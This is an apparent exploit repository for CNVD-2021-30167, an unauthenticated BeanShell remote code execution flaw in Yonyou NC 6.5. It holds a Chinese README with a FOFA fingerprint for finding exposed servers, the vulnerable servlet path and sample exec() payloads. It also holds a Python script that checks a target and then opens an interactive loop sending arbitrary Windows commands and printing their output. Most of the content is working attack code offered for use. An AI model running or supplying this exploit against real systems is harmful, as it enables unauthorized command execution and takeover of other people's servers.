├── README.md
└── beanshell-rce.py


/README.md:
--------------------------------------------------------------------------------
 1 | # 用友NC BeanShell远程代码执行
 2 | 
 3 | 编号: CNVD-2021-30167
 4 | 
 5 | 影响版本: NC6.5
 6 | 
 7 | fofa指纹: icon_hash="1085941792"
 8 | 
 9 | 该漏洞是由于用友NC对外开放了BeanShell接口，攻击者可以在未授权的情况下直接访问该接口，并构造恶意数据执行任意代码并获取服务器权限。
10 | 
11 | POC：
12 | ```bash
13 | # get
14 | /servlet/~ic/bsh.servlet.BshServlet
15 | ```
16 | 
17 | eg:
18 | ```bash
19 | exec("whomai")
20 | exec("cmd /c whoami")
21 | exec("/bin/sh whoami")
22 | ```
23 | 
24 | 注：该脚本中的命令执行, 仅适用于Windoes, Linux请手动测试。
25 | 
26 | ![image-20210604183648070](https://oss.zjun.info/zjun.info/20210604183654.png)


--------------------------------------------------------------------------------
/beanshell-rce.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import re
 3 | import sys
 4 | from urllib.parse import quote
 5 | 
 6 | RED = '\x1b[1;91m'
 7 | BLUE = '\033[1;94m'
 8 | GREEN = '\033[1;32m'
 9 | BOLD = '\033[1m'
10 | ENDC = '\033[0m'
11 | 
12 | 
13 | def Title():
14 |     print(BOLD + '''
15 |     Title: CNVD-2021-30167 用友NC BeanShell RCE
16 |     Version: NC6.5
17 |     Author: zjun
18 |     HomePage: https://www.zjun.info
19 |     ''' + ENDC)
20 | 
21 | 
22 | def NcCheck(target_url):
23 |     print(BLUE + '\n[*]正在检测漏洞是否存在\n' + ENDC)
24 |     url = target_url + '/servlet/~ic/bsh.servlet.BshServlet'
25 |     headers = {
26 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360'
27 |     }
28 |     try:
29 |         response = requests.get(url=url, headers=headers, timeout=5)
30 |         if response.status_code == 200 and 'BeanShell' in response.text:
31 |             print(GREEN + '[+]BeanShell页面存在, 可能存在漏洞: {}\n'.format(url) + ENDC)
32 |             return url
33 |         else:
34 |             print(RED + '[-]漏洞不存在\n' + ENDC)
35 |             sys.exit(0)
36 |     except:
37 |         print(RED + '[-]无法与目标建立连接\n' + ENDC)
38 |         sys.exit(0)
39 | 
40 | 
41 | def NcRce(url):
42 |     print(BLUE + "[*]在command后输入执行命令, 仅适用于Windoes, Linux请手动测试\n" + ENDC)
43 |     headers = {
44 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360',
45 |         'Content-Type': 'application/x-www-form-urlencoded'
46 |     }
47 |     while True:
48 |         command = str(input(BOLD + 'command: ' + ENDC))
49 |         data = 'bsh.script=' + quote('''exec("cmd /c {}")'''.format(command.replace('\\', '\\\\')), 'utf-8')
50 |         try:
51 |             response = requests.post(url=url, headers=headers, data=data)
52 |             pattern = re.compile('<pre>(.*?)</pre>', re.S)
53 |             result = re.search(pattern, response.text)
54 |             print(result[0].replace('<pre>', '').replace('</pre>', ''))
55 |         except:
56 |             print(RED + '[-]未知错误\n' + ENDC)
57 |             sys.exit(0)
58 | 
59 | 
60 | if __name__ == '__main__':
61 |     Title()
62 |     target_url = str(input(BOLD + 'Url: ' + ENDC))
63 |     url = NcCheck(target_url)
64 |     NcRce(url)
65 | 


--------------------------------------------------------------------------------